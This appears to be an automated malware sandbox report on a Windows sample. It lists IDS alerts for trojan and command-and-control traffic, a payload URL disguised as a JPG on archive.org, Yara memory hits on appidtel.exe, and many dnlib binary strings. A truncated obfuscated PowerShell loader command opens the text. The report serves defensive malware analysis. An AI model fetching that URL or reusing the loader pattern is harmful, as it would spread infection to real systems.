C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgne
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-10T09:29:05.015472+020020490381A Network Trojan was detected207.241.227.242443192.168.2.849706TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-10T09:29:06.325617+020028410751Malware Command and Control Activity Detected192.168.2.849708188.114.96.3443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgVirustotal: Detection: 8%Perma Link
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: unknownHTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1769352732.00007FFB4A210000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000B.00000002.1841958325.000000000356E000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1808603345.0000000003225000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1806418136.0000000003079000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000B.00000002.1841958325.000000000356E000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1808603345.0000000003225000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1806418136.0000000003079000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1769352732.00007FFB4A210000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
